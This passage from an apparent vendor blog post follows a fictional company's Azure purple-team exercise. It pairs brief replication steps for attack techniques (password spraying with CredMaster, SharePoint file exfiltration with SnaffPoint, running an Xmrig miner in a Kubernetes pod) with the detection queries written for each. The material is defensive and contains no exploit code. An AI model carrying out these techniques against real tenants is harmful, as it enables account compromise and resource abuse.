wp-elements-ec15825ffdec6e9b6428b2c0e89ef5aa\">The Azure AD diagnostic settings are double checked and see that everything seems to be enabled: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1118\" height=\"1630\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Purple-teaming-Azure-Virtual-Machines.jpg\" alt=\"Purple teaming Azure Virtual Machines\" class=\"wp-image-4564\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-e4fae009bdc18e2022914a3fec99dc8e\">After some digging, it is discovered that there is another diagnostic setting that was missed.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-6894f3c0a74a04e62538932e5db3f75d\">Navigating to the Azure portal, then Monitor, then Activity log, the activity is visible there, but the engineers do not have these events forwarded to something like an event hub.<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"565\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/VM-run-command.jpg\" alt=\"VM run command\" class=\"wp-image-4565\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-57310b5e07c2b229d5db17f21a8e19f9\">The team goes ahead and creates the new diagnostic setting, forwarding all activity to an event hub: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1114\" height=\"1550\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Navigating-to-the-Azure-portal.jpg\" alt=\"VM run command\" class=\"wp-image-4566\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-9d2a742da1d5c1c28ad986f9caf0557e\">A run command is issued to the virtual machine again, and this time the necessary telemetry is present and a CloudSIEM rule is crafted:<strong><br><\/strong><\/p>\n\n\n\n<pre>   metadata_vendor = 'Microsoft'\r\nAND metadata_product = 'Azure'\r\nAND action = \"Administrative\"\r\nAND description = \"MICROSOFT.COMPUTE\/VIRTUALMACHINES\/RUNCOMMAND\/ACTION\"\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-81aa082f438e9662785106325d3b4ae7\">With a signal being generated: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1473\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/CloudSIEM-rule-is-crafted.jpg\" alt=\"CloudSIEM rule is crafted\" class=\"wp-image-4567\" title=\"\"><\/figure>\n<\/div>\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-58e60ea9311f893ac081c46b2338ef92\" id=\"delete_virtual_machines\">Delete Virtual Machines<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-294716a14e660e7e53b07b4d138ac9bb\">The team now moves from a run command to deleting a virtual machine, to ensure that they get some kind of signal or alert when a virtual machine is deleted in their environment, the team proceeds to create and delete a test virtual machine and everything works!&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-be5cfcb753b64c3a880ffa5b8ad56940\">The team receives the following CloudSIEM signal: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1586\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Delete-Virtual-Machines.jpg\" alt=\"CloudSIEM rule is crafted\" class=\"wp-image-4568\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-5562e907de6f1316b0976ef3fc9c424d\">A nice smooth test where everything worked as expected, the team is happy with this result and proceeds to update their notes:&nbsp;<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>No<\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID &#8211; 2nd Attempt<\/td>\n<td>Password spray via Credmaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>Detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Register MFA Device<\/td>\n<td>Browse to aka.ms\/mfasetup, log in with the relevant user account and follow prompts to register a new multi-factor authentication device.<\/td>\n<td>Azure AD \/ Entra ID Audit Logs, UserManagement Category<\/td>\n<td>Real-time detection deemed unnecessary, search created and saved<\/td>\n<\/tr>\n<tr>\n<td>SharePoint Exfiltration<\/td>\n<td>Create test SharePoint site, run SnaffPoint to search for a sensitive file and then download the file<\/td>\n<td>Office 365 logs, SharePoint operations<\/td>\n<td>Detection Crafted<\/td>\n<\/tr>\n<tr>\n<td>Teams External Access Enabled<\/td>\n<td>Browse to Office admin portal, enable external access to Teams<\/td>\n<td>Office 365, TeamsAdminAction<\/td>\n<td>No, CloudSIEM Signal created for enablement of external Teams guest access<\/td>\n<\/tr>\n<tr>\n<td>VM Run Command<\/td>\n<td>Browse to Azure Portal, Select test Virtual Machine, Navigate to \u201cRun command\u201d, pick any and execute a benign command<\/td>\n<td>Azure Monitor Diagnostic Setting &#8211; Administrative Events specifically<\/td>\n<td>No, data source missing, was added as part of exercise<\/td>\n<\/tr>\n<tr>\n<td>Delete Virtual machine<\/td>\n<td>Browse to Azure Portal, select test virtual machine, execute deletion<\/td>\n<td>Azure administrative logs<\/td>\n<td>Yes, signal generated<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-4756ebf32faced661e1516226d0dff93\" id=\"purple_teaming_aks\">Purple teaming AKS<\/h2>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-4794c9d990a4668c989ccfd5a0d1c0ef\" id=\"internet-accessible_cluster\">Internet-accessible cluster<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-51cbbfc3df665034e38b99a03a4d0837\">The team is excited to continue their purple team, and shifts gears to focus on their Azure Kubernetes Service (AKS) deployment.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-2e6dab1216c848a715953d066165492f\">They would like to know if they have the relevant telemetry and detection logic necessary to ascertain when an external IP address attempts to connect to their cluster.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-4bdc735c39199879789a533a12077c26\">The team proceeds to execute a simple curl command to attempt to connect to their cluster:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1764\" height=\"428\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Purple-teaming-AKS.jpg\" alt=\"Purple teaming AKS\" class=\"wp-image-4569\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-71e2037fbeeca6af2f7d2370d3ccfb67\">As a next step, the telemetry needs to be examined to ascertain whether this activity is visible.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-eb681b499ccd7b45e07a5130f0387015\">Rather than specifically searching for a curl user agent, the team wants to start with a broader query that looks at unauthorized requests from external IP addresses to their AKS cluster.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-690d2f4001674339d31072913b14a138\">The following query is crafted:<\/p>\n\n\n\n<pre>_source=\"Azure AKS\" and _collector=\"Azure AKS\"\r\n| where category = \"kube-audit\"\r\n| json field=%\"properties.log\" \"userAgent\" as userAgent\r\n| json field=%\"properties.log\" \"responseStatus.message\" as responseMessage\r\n| json field=%\"properties.log\" \"sourceIPs[0]\" as sourceIP\r\n| json field=%\"properties.log\" \"requestURI\" as requestURI\r\n| isPublicIP(sourceIP) as is_public_ip\r\n| where responseMessage = \"Unauthorized\"\r\n| where is_public_ip\r\n| values(userAgent) as user_agents,values(requestURI) as URIs by sourceIP\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-196cba218767ed82fe8ed51e49aad5eb\">Everyone is extremely surprised by the results!<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-18ad37c9bdda63e3e27f722a9c2344af\">Not only&nbsp; is the curl request visible, resulting in an unauthorized response, but many other exploit and discovery attempts from all kinds of IP addresses are seen, including Log4j and Log4Shell exploit attempts:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1556\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Internet-accessible-cluster.jpg\" alt=\"Internet-accessible cluster\" class=\"wp-image-4570\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-3e3b725b49a4086784571dda3e04756c\">In this instance and due to the sheer amount of noise hitting the cluster, the team agrees that crafting detections for this type of activity might not be the best use of their precious resources.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c0d499f8dc369911bfe009a3e71b9b50\">The Kubernetes administrator is brought in and shown what kind of traffic is hitting the cluster.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-2d693e58be20ec4cd8c2be8a79469115\">After speaking with management and showing them the results of this purple team execution, everyone is in agreement that this configuration &#8211; a publicly exposed AKS cluster &#8211; brings unnecessary risk to the enterprise.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a7f8cf2622cb325859817e542baa85ff\">A path forward is agreed upon to add an IP allow-list to the cluster, so that not every public IP can attempt to connect to it. A huge win for the purple team exercise!&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-2ae65e56d82830ada3cdcff9f36faa04\" id=\"crypto_mining\">Crypto mining<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-8d11f92f185cf24d7f60583639fa3b75\">Many exposed Kubernetes cluster attacks end with the deployment of some kind of crypto miner. It is decided that this activity should be executed and replicated within the AKS cluster.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-732462e042a232e4547800405f419ce4\">A basic Ubuntu pod YAML definition is crafted and deployed to the cluster:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1034\" height=\"856\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Crypto-mining.jpg\" alt=\"Crypto mining\" class=\"wp-image-4571\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-7e70c1e6481941a73a68427a3afd97de\"><strong><br><\/strong><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-87eb709e02f4b6e349f41cf006e5a43c\">A bash shell is executed within the pod, and an Xmrig miner is installed and ran:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"935\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Ubuntu-pod-YAML.jpg\" alt=\"Ubuntu pod YAML\" class=\"wp-image-4572\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a5cb514dd601dfd885246cd5e16f7c1e\">After a few minutes of letting the pod execute the Xmrig process, the team receives the following alert: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"951\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Xmrig-process.jpg\" alt=\"Xmrig process\" class=\"wp-image-4573\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-2d650059d5496e918f42f9c06abc659a\">Because the <a href=\"https:\/\/help.sumologic.com\/docs\/observability\/kubernetes\/quickstart\/\" target=\"_blank\" rel=\"noopener\">Sumo Logic Kubernetes solution<\/a> was deployed on the cluster, deep insights and visibility were available without any additional engineering lift or toil.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-3b0b02fd73fb042ab45e12388317e101\">In addition to monitoring for high CPU usage, it was also decided to craft a query that looks for pods being created in the cluster.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-36bac155f47a4cf178bb70e83596962a\">This would be suspicious activity for this particular Kubernetes cluster, as typically the engineering team responsible for Kubernetes deployments does not deploy pods individually, but rather wraps them in deployment definition.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-87e566015523a5020798ef3041bf49be\">Indeed, as mentioned previously, collaboration is critical to a purple team exercise, and the FakeORG threat detection engineers were able to learn something new about another team\u2019s internal process, which in turn aided them in threat detection vectors.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-1dc4c93c0e1fe6e821adb6bafa3dcae6\">The following query is crafted to determine when pods are created: <br><\/p>\n\n\n\n<pre>_sourceCategory=AKS AND _source = \"Azure AKS\" ubuntu\r\n| json field=%\"properties.log\" \"verb\" as verb\r\n| json field=%\"properties.log\" \"objectRef.resource\" as resource\r\n| json field=%\"properties.log\" \"requestObject.kind\" as request_object\r\n| json field=%\"properties.log\" \"requestObject.metadata.name\" as object_name\r\n| json field=%\"properties.log\" \"sourceIPs[0]\" as sourceIP\r\n| where verb = \"create\"\r\n| where resource = \"pods\"\r\n| where request_object = \"Pod\"\r\n| values(object_name) as object_name,values(verb) as verb by sourceIP\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-da0032710605e2efd5031e2aecd995b6\"><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-6e7091401fac3cbc4e6694e152f42651\">And the results are returned: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1120\" height=\"298\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/FakeORG-threat-detection.jpg\" alt=\"FakeORG threat detection\" class=\"wp-image-4574\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-7de55dbe5b6512870220682b74f22c74\">Another alert is crafted for when a terminal is attached to a pod within the cluster:<\/p>\n\n\n\n<pre>_sourceCategory=AKS AND _source = \"Azure AKS\" \r\n| json field=%\"properties.log\" \"requestURI\" as requestURI \r\n| json field=%\"properties.log\" \"sourceIPs[0]\" as sourceIP \r\n| where requestURI matches \/(tty=true)\/\r\n| values(requestURI) by sourceIP\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-20a9d26e736e1eb4db73cac2c96fb8e5\">And the results:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"592\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/threat-detection-vectors.jpg\" alt=\"threat detection vectors\" class=\"wp-image-4575\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-f49f9df967158666821d7d3a5d519c38\">Once again, the notes are updated:&nbsp;<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>No<\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID &#8211; 2nd Attempt<\/td>\n<td>Password spray via Credmaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>Detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Register MFA Device<\/td>\n<td>Browse to aka.ms\/mfasetup, log in with the relevant user account and follow prompts to register a new multi-factor authentication device.<\/td>\n<td>Azure AD \/ Entra ID Audit Logs, UserManagement Category<\/td>\n<td>Real-time detection deemed unnecessary, search created and saved<\/td>\n<\/tr>\n<tr>\n<td>SharePoint Exfiltration<\/td>\n<td>Create test SharePoint site, run SnaffPoint to search for a sensitive file and then download the file<\/td>\n<td>Office 365 logs, SharePoint operations<\/td>\n<td>Detection Crafted<\/td>\n<\/tr>\n<tr>\n<td>Teams External Access Enabled<\/td>\n<td>Browse to Office admin portal, enable external access to Teams<\/td>\n<td>Office 365, TeamsAdminAction<\/td>\n<td>No, CloudSIEM Signal created for enablement of external Teams guest access<\/td>\n<\/tr>\n<tr>\n<td>VM Run Command<\/td>\n<td>Browse to Azure Portal, Select test Virtual Machine, Navigate to \u201cRun command\u201d, pick any and execute a benign command<\/td>\n<td>Azure Monitor Diagnostic Setting &#8211; Administrative Events specifically<\/td>\n<td>No, data source missing, was added as part of exercise<\/td>\n<\/tr>\n<tr>\n<td>Delete Virtual machine<\/td>\n<td>Browse to Azure Portal, select test virtual machine, execute deletion<\/td>\n<td>Azure administrative logs<\/td>\n<td>Yes, signal generated<\/td>\n<\/tr>\n<tr>\n<td>Internet Accessible Cluster<\/td>\n<td>Attempt to use curl to connect to clusters external IP address<\/td>\n<td>AKS Diagnostic Logs Enabled &#8211; Kubernetes API Server<\/td>\n<td>NA &#8211; configuration change made<\/td>\n<\/tr>\n<tr>\n<td>CryptoMining<\/td>\n<td>Spin up pod, exec into pod, install Xmrig on pod<\/td>\n<td>AKS Diagnostic Logs Enabled &#8211; Kubernetes API Server<\/td>\n<td>Existing metrics-based detection, search looking for pod creations created, search for execution into pod also created<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-18c78d3e8384ca6c850d619345330ed0\" id=\"purple_teaming_azure_devops\">Purple teaming Azure DevOps<\/h2>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-3c5101a18c02f484aad467d9da9283f9\" id=\"policy_tampering\">Policy tampering<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-246addb954884885f5afaa25d8c9f56d\">FakeORG is a relatively new user of Azure DevOps and is just getting started utilizing this service.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-1af57831f81d136c2648e926d6a2233d\">A risk for their organization is a threat actor making their way into the DevOps environment and infecting their development pipeline in order to set the stage for a supply-chain style attack.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c1be9fafb7bf153ad8979ca07042204b\">A requirement is set to monitor all policy changes in Azure DevOps, so the team navigates to the organizational settings menu in Azure DevOps and proceeds to enable Third-party application access via OAuth in order to see if this change can be observed in the telemetry. <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1447\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Purple-teaming-Azure-DevOps.jpg\" alt=\"Purple teaming Azure DevOps\" class=\"wp-image-4576\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-dbfb3086fcd5b22a9f416102a41b8a8b\">The telemetry is examined and a query is crafted: <br><\/p>\n\n\n\n<pre>_source=\"AzureDevOps\" and _collector=\"AzureDevOps\"\r\n| %\"data.data.policyname\" as policy_name\r\n| %\"data.data.policyvalue\" as policy_value\r\n| %\"data.actorupn\" as upn\r\n| %\"data.ipaddress\" as ip_address\r\n| where !isNull(policy_value)\r\n| where policy_name = \"Policy.DisallowOAuthAuthentication\"\r\n| values(policy_name) as policy_name,values(policy_value) as policy_value by upn,ip_address\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-9d1b45c62953cb1ae65c06fc2f89d0ef\">And the results returned:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"776\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Policy-tampering.jpg\" alt=\"Policy tampering\" class=\"wp-image-4577\" title=\"\"><\/figure>\n<\/div>\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-e97a42f914be2c0e5c540924e382285a\" id=\"permission_changes\">Permission changes<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-cd62b9dc512d77da8d617eb1a3746609\">For the next and final execution, the team wants to see if they can capture Azure DevOps permission changes.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-3c82bd3c58e5490a10d93bbd01a5860e\">A group named \u201cTestGroup1234\u201d is created and the group is granted \u201cAdminister workspaces\u201d permissions:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1538\" height=\"1868\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Permission-changes.jpg\" alt=\"Permission changes\" class=\"wp-image-4578\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-7e70c1e6481941a73a68427a3afd97de\"><strong><br><\/strong><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-cce8b2ee250d613ae881f015f11bc488\">After digging through the telemetry, the following query is crafted: <br><\/p>\n\n\n\n<pre>_source=\"AzureDevOps\" and _collector=\"AzureDevOps\"\r\n| where %\"data.actionid\" = \"Security.ModifyPermission\"\r\n| %\"data.data.permissionmodifiedto\" as permission_modified_to\r\n| %\"data.data.changedpermission\" as permission_changed\r\n| %\"data.data.subjectdisplayname\" as subject_of_change\r\n| %\"data.ipaddress\" as src_ip\r\n| %\"data.actorupn\" as upn\r\n| values(subject_of_change) as subject_of_change,values(permission_changed) as permission_changed,values(permission_modified_to) as permission_modified_to by upn,src_ip\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-5cd49dad2a59715e991428ff14e9d8aa\">And the results: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"861\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Administer-workspaces.jpg\" alt=\"Administer workspaces\" class=\"wp-image-4579\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-caab2d2c112238654b624be1f771555d\">And one final time, the notes are updated:&nbsp;<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>No<\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID &#8211; 2nd Attempt<\/td>\n<td>Password spray via Credmaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>Detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Register MFA Device<\/td>\n<td>Browse to aka.ms\/mfasetup, log in with the relevant user account and follow prompts to register a new multi factor authentication device.<\/td>\n<td>Azure AD \/ Entra ID Audit Logs, UserManagement Category<\/td>\n<td>Real-time detection deemed unnecessary, search created and saved<\/td>\n<\/tr>\n<tr>\n<td>SharePoint Exfiltration<\/td>\n<td>Create test SharePoint site, run SnaffPoint to search for a sensitive file and then download the file<\/td>\n<td>Office 365 logs, SharePoint operations<\/td>\n<td>Detection Crafted<\/td>\n<\/tr>\n<tr>\n<td>Teams External Access Enabled<\/td>\n<td>Browse to Office admin portal, enable external access to Teams<\/td>\n<td>Office 365, TeamsAdminAction<\/td>\n<td>No, CloudSIEM Signal created for enablement of external Teams guest access<\/td>\n<\/tr>\n<tr>\n<td>VM Run Command<\/td>\n<td>Browse to Azure Portal, Select test Virtual Machine, Navigate to \u201cRun command\u201d, pick any and execute a benign command<\/td>\n<td>Azure Monitor Diagnostic Setting &#8211; Administrative Events specifically<\/td>\n<td>No, data source missing, was added as part of exercise<\/td>\n<\/tr>\n<tr>\n<td>Delete Virtual machine<\/td>\n<td>Browse to Azure Portal, select test virtual machine, execute deletion<\/td>\n<td>Azure administrative logs<\/td>\n<td>Yes, signal generated<\/td>\n<\/tr>\n<tr>\n<td>Internet Accessible Cluster<\/td>\n<td>Attempt to use curl to connect to clusters external IP address<\/td>\n<td>AKS Diagnostic Logs Enabled &#8211; Kubernetes API Server<\/td>\n<td>NA &#8211; configuration change made<\/td>\n<\/tr>\n<tr>\n<td>CryptoMining<\/td>\n<td>Spin up pod, exec into pod, install Xmrig on pod<\/td>\n<td>AKS Diagnostic Logs Enabled &#8211; Kubernetes API Server<\/td>\n<td>Existing metrics-based detection, search looking for pod creations created, search for execution into pod also created<\/td>\n<\/tr>\n<tr>\n<td>Allow third-party OAuth to Azure DevOps<\/td>\n<td>Browse to AzureDevOps portal &#8211; Organizational Settings &#8211; Policies &#8211; Turn on Third-party access via OAuth<\/td>\n<td>AzureDevOps Audit Stream, sending to Event Grid<\/td>\n<td>No, detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Grant group \u201cAdminister the workplace\u201d permissions in AzureDevOps<\/td>\n<td>Browse to AzureDevOps portal &#8211; Organizational Settings &#8211; Permissions &#8211; Select test group &#8211; add necessary permission<\/td>\n<td>AzureDevOps Audit Stream, sending to Event Grid<\/td>\n<td>No, detection crafted<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-c88c7616b9d53c6634832a722aaddd61\" id=\"metrics\">Metrics<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-97e6edd500648640dcc30bc6c2fb2752\">The team has had a long few days, knee deep in TTPs and queries, and are very keen to wrap up the purple team exercise, debrief and transfer their rough notes to their instance of <a href=\"https:\/\/github.com\/SecurityRiskAdvisors\/VECTR\" target=\"_blank\" rel=\"noopener\">Vectr<\/a> to present leadership the results of the purple team exercise.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-7b736a908a5eb9a94c12e7ed86e86e03\">Once all the relevant information has been entered, the overall purple team looks like:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1038\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Metrics.jpg\" alt=\"Metrics\" class=\"wp-image-4580\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c2c1bb40455b50f88fa2d33bb44e06f2\">With the escalation path:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1925\" height=\"450\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/escalation-path.jpg\" alt=\"escalation path\" class=\"wp-image-4581\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-adb92662610e1b7d7100ab2167c5470b\">In total, this purple team consisted of:<\/p>\n\n\n\n<ul>\n<li><strong>12<\/strong> Executions<\/li>\n<li><strong>1<\/strong> system being hardened<\/li>\n<li><strong>1<\/strong> additional telemetry source being identified as security-relevant and ingested<\/li>\n<li><strong>8<\/strong> new alerts being crafted<\/li>\n<li><strong>1<\/strong> new search being crafted<\/li>\n<li><strong>1<\/strong> execution detected with an existing rule<\/li>\n<\/ul>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-8831f3f26f0caf7e6d0298442ddda8eb\">A<a href=\"https:\/\/www.sumologic.com\/blog\/cloud-siem-mitre-attack\/\" target=\"_blank\" rel=\"noopener\"> MITRE ATT&amp;CK heatmap<\/a> is also generated for the exercise:&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"conclusion\">Conclusion<\/h2>\n\n\n\n<p class=\"has-text-align-center\">Both the FakeORG team and their leadership is 